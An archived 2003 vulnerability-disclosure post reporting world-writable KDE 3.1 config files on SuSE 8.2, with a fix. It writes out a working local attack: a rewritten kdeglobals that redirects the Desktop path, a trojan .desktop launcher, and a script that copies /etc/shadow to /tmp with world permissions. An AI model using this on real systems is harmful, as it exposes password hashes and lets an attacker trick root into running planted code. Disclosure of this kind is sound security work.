Vulnerability Development mailing list archives
KDE 3.1 - Suse 8.2 - kdeglobals world writable
From: Martin Fallon <mar_fallon () yahoo com br>
Date: Fri, 14 Nov 2003 13:33:25 -0300 (ART)
Hi, Mrs.! I have found one problem in suse 8.2 with KDE 3.1 (default instalation in brazilian version). The configurarion file "kdeglobals" in /etc/opt/kde3/share/config is world writable. One attacker can exploit this vulnerability with many ways. One basic example of attack is: I - Overwrite de kdeglobals file with contents below: # # written by SuSEconfig.kde # [Locale] Country=pt Language=pt:BR #Abaixo jah alterados. [Paths] Desktop=/tmp/Desktop II - Create folder /tmp/Desktop e one trojan horse in some file .desktop inside then. Example: glaudson@suse:/tmp/Desktop> cat xpdf.desktop [Desktop Entry] Exec=/tmp/AutoStart/teste.sh Icon=gv TerminalOptions= Path= Type=Application Terminal=0 X-KDE-StartupNotify=false glaudson@suse:/tmp/Desktop> II - Create file to execute /tmp/Autostart/teste.sh with backdoor/trojan/spyware/malware code.Example: glaudson@suse:/tmp/Desktop> cat ../AutoStart/teste.sh #!/bin/bash cp /etc/shadow /tmp/shadow chmod 0777 /tmp/shadow The icon "xpdf" will be appear in root's desktop. If root run de icon, he run the trojan horse and attack will be succeded. There are many other forms for exploit this bug. Solution: chmod 0500 /etc/opt/kde3/share/config/kdeglobals or rm -rf /etc/opt/kde3/share/config/kdeglobals There are again other files world writable in suse 8.2(brazilian version): glaudson@suse:/tmp/Desktop> find /etc/opt -perm -2 ! \( -type l -o -type c -o -type s -o -perm -1000 \) /etc/opt/kde3/share/config/kmailrc /etc/opt/kde3/share/config/kioslaverc /etc/opt/kde3/share/config/kdeglobals.SuSEconfig /etc/opt/kde3/share/config/kdeglobals find: /etc/opt/kde3/share/servicetypes: Permissão negada glaudson@suse:/tmp/Desktop> cat /etc/SuSE-release SuSE Linux 8.2 (i586) VERSION = 8.2 glaudson@suse:/tmp/Desktop> cat /proc/version Linux version 2.4.20-4GB-athlon (root () Athlon suse de) (gcc version 3.3 20030226 (prerelease) (SuSE Linux)) #1 Mon Mar 17 17:56:47 UTC 2003 Best Regards, Martin Fallon. Mercenarie's Club http://cdm.frontthescene.com.br/ ______________________________________________________________________ Yahoo! Mail: 6MB, anti-spam e antivírus gratuito! Crie sua conta agora: http://mail.yahoo.com.br
Current thread:
- KDE 3.1 - Suse 8.2 - kdeglobals world writable Martin Fallon (Nov 14)
- Re: KDE 3.1 - Suse 8.2 - kdeglobals world writable Dirk Mueller (Nov 14)